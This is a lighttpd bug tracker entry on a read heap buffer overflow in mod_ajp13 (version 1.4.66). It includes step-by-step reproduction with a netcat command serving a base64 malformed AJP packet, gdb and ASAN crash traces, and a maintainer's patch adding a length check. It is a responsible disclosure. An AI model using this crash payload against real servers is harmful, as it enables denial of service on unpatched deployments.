Actions
Bug #3170
closedmod_ajp13 read heap buffer overflow
ASK QUESTIONS IN Forums:
No
Description
Read heap buffer overflow happens when the server receives malformed response from AJP backend.
The vulnerability was detected on Ubuntu 22.04 x86_64:
- lighttpd 1.4.66 built from source
PoC:
1. Build
$ wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.66.tar.gz $ tar zxf lighttpd-1.4.66.tar.gz $ cd lighttpd-1.4.65/ $ scons -j 4 build_static=1 build_dynamic=0
2. Prepare configuration
server.document-root = "/home/mmm/v/lighttpd/webroot"
server.port = 8001
server.modules += ("mod_ajp13")
ajp13.server = ( "" =>
( (
"host" => "127.0.0.1",
"port" => 5577
) )
)
3. Start the server
./lighttpd -D -f ~/ajp.conf
4. Run AJP backend serving malformed response
echo "QUIAAASA/wAA" | base64 -d | nc -l 5577
5. Send HTTP request causing AJP connection
curl localhost:8001
Crash under gdb:
2022-08-14 14:56:07: (src/server.c.1588) server started (lighttpd/1.4.66) Program received signal SIGSEGV, Segmentation fault. ajp13_expand_headers (hctx=0x5555555f14e0, plen=4294869346, b=0x5555555e66d0) at src/mod_ajp13.c:740 740 len = ajp13_dec_uint16(ptr); (gdb) print ptr $1 = (uint8_t *) 0x555555607000 <error: Cannot access memory at address 0x555555607000> (gdb) bt #0 ajp13_expand_headers (hctx=0x5555555f14e0, plen=4294869346, b=0x5555555e66d0) at src/mod_ajp13.c:740 #1 ajp13_recv_parse_loop (hctx=0x5555555f14e0, r=<optimized out>) at src/mod_ajp13.c:821 #2 ajp13_recv_parse (r=<optimized out>, opts=<optimized out>, b=<optimized out>, n=<optimized out>) at src/mod_ajp13.c:955 #3 0x00005555555985a0 in http_response_read (r=r@entry=0x5555555eed00, opts=opts@entry=0x5555555f1580, b=b@entry=0x5555555e8b70, fdn=0x5555555f17d0) at src/http-header-glue.c:1355 #4 0x000055555559046a in gw_recv_response (hctx=0x5555555f14e0, r=0x5555555eed00) at src/gw_backend.c:2337 #5 0x000055555559102b in gw_process_fdevent (revents=1, r=0x5555555eed00, hctx=0x5555555f14e0) at src/gw_backend.c:2435 #6 gw_handle_subrequest (r=0x5555555eed00, p_d=<optimized out>) at src/gw_backend.c:2167 #7 0x000055555557eefe in http_response_handler (r=0x5555555eed00) at src/response.c:982 #8 0x0000555555580dbb in connection_state_machine_loop (r=0x5555555eed00, con=0x5555555eed00) at src/connections.c:1007 #9 0x00005555555806a9 in connection_state_machine_h1 (con=0x5555555eed00) at src/connections.c:1358 #10 connection_state_machine (con=0x5555555eed00) at src/connections.c:1358 #11 0x000055555557d62a in server_run_con_queue (sentinel=<optimized out>, joblist=<optimized out>) at src/server.c:1958 #12 server_main_loop (srv=0x5555555e6520) at src/server.c:2011 #13 0x000055555555fe19 in main (argc=4, argv=0x7fffffffe018) at src/server.c:2085
Crash under ASAN:
2022-08-14 14:56:48: (src/server.c.1588) server started (lighttpd/1.4.66)
=================================================================
==1859941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004901 at pc 0x000000434647 bp 0x7fffffffda60 sp 0x7fffffffd220
READ of size 16706 at 0x625000004901 thread T0
#0 0x434646 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x434646)
#1 0x4ef9f0 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4ef9f0)
#2 0x527708 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x527708)
#3 0x526fc2 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x526fc2)
#4 0x5266c5 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x5266c5)
#5 0x518bb5 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x518bb5)
#6 0x503e17 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x503e17)
#7 0x503b3e (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x503b3e)
#8 0x50359d (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x50359d)
#9 0x4cad18 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4cad18)
#10 0x4cf502 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4cf502)
#11 0x4ce650 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4ce650)
#12 0x4ce054 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4ce054)
#13 0x4c9dbc (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4c9dbc)
#14 0x4c808f (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4c808f)
#15 0x4c57a7 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x4c57a7)
#16 0x7ffff7b78082 (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
#17 0x41d8ed (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x41d8ed)
0x625000004901 is located 0 bytes to the right of 8193-byte region [0x625000002900,0x625000004901)
allocated by thread T0 here:
#0 0x496326 (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x496326)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/mmm/lighttpd-1.4.66-asan/sconsbuild/static/build/lighttpd+0x434646)
Shadow bytes around the buggy address:
0x0c4a7fff88d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff88e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff88f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a7fff8920:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1859941==ABORTING
Aborted
Updated by gstrauss over 1 year ago
- Status changed from New to Patch Pending
- Target version changed from 1.4.xx to 1.4.67
Thank you for the bug report and for the details to reproduce.
A malicious backend can trigger a 1-byte unsigned integer underflow (and wrap-around) at
https://git.lighttpd.net/lighttpd/lighttpd1.4/src/branch/master/src/mod_ajp13.c#L676
The underflow results in memory reads until an out-of-bounds memory read causes a crash.
--- a/src/mod_ajp13.c
+++ b/src/mod_ajp13.c
@@ -812,6 +812,12 @@ ajp13_recv_parse_loop (request_st * const r, handler_ctx * const hctx)
switch(ptr[4]) {
case AJP13_SEND_HEADERS:
if (0 == r->resp_body_started) {
+ if (plen < 3) {
+ log_error(errh, __FILE__, __LINE__,
+ "AJP13: headers packet received with invalid length");
+ return HANDLER_FINISHED;
+ }
+
buffer *hdrs = hctx->response;
if (NULL == hdrs) {How would you like to be credited in the git patch commit message?
hdrs = r->tmp_buf;
How would you like to be credited in the git patch commit message?
[Edit: crediting as MichaĆ Dardas] Thanks!
Updated by gstrauss over 1 year ago
- Status changed from Patch Pending to Fixed
Applied in changeset 0b49e767b906d6861f63d3764001bd73a65265dc.
Actions
Also available in: Atom